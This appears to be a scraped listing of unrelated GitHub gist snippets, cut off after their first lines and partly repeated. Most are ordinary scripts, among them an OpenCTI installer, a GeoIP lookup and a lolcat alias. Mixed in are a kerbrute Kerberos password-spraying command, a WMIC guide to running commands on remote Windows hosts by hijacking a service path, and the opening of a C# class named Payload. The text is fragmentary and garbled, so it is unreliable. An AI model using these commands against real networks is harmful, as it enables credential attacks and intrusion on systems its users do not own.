With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
| /* | |
| ███╗ ███╗ ██████╗ ██████╗ ███████╗ | |
| ████╗ ████║██╔═══██╗██╔══██╗╚══███╔╝ | |
| ██╔████╔██║██║ ██║██║ ██║ ███╔╝ | |
| ██║╚██╔╝██║██║ ██║██║ ██║ ███╔╝ | |
| ██║ ╚═╝ ██║╚██████╔╝██████╔╝███████╗ | |
| ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ | |
| If you have this you are trusted. Please do not leak! | |
| MODZ SERVER SIDE V1 By DaddyL33T |
| # /------------------------------------------\ | |
| # | don't forget to download the .tp file | | |
| # | and place it in the user's directory :› | | |
| # | | | |
| # | also install lolcat: | | |
| # | https://github.com/busyloop/lolcat | | |
| # \------------------------------------------/ | |
| alias test-passed='if [ "$?" -eq "0" ]; then lolcat ~/.tp -a -s 40 -d 2; fi;' |
| #! /bin/bash -e | |
| # script: opencti_ubuntu_installer.sh | |
| # purpose: to automate install opencti based on manual deployment below | |
| # process: https://opencti-platform.github.io/docs/installation/manual | |
| # license: Apache 2.0 | |
| # check root ------------------------------------------------------- |
| #!/bin/bash | |
| # | |
| # By: Brady Shea - 10FEB2020 | |
| # | |
| # Usage (ip4 only): | |
| # geoip2lookup IP_ADDRESS | |
| # | |
| # ** Install GeoIP Tool and Updater ** | |
| # | |
| # sudo add-apt-repository ppa:maxmind/ppa |
| # This code was written by Chananel Gerstensang.Contact: [email protected], | |
| # Linkedin: https://www.linkedin.com/in/chananel-gerstensang-21a31b157 | |
| # Github: https://github.com/ChananelCode | |
| # Enjoy! | |
| import requests | |
| counter_Domains = 0 | |
| Domains_List = open("./DomainsList.txt", "r").read().split() |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
| As always, only for use on networks you own or have permission to test against. | |
| Similar functionality to SpiderLabs SCShell (https://github.com/SpiderLabs/SCShell) but from the command line using WMIC to run commands on other systems remotely. | |
| If attempting to run multiple commands, SCShell will probably be move convenient as it automates the below steps. However, for one-offs this works fine as well. | |
| The process involves a total of four commands, three of which can be combined on the command line to form one large block. | |
| Step 1: Get the current pathName of your target service so we can restore it once we've ran our command (in our case XblAuthManager) | |
| wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName |
| using System; | |
| using System.IO; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.IO.Compression; | |
| using System.Runtime.InteropServices; | |
| public class Payload | |
| { | |
| public Payload() |
| document.getElementsByClassName("input")[1].innerHTML="This message was written via JS script! "; // Fills the text box message | |
| var input = document.getElementsByClassName("icon btn-icon icon-send");//Grabs the send button | |
| input[0].click();// Clicks the send button |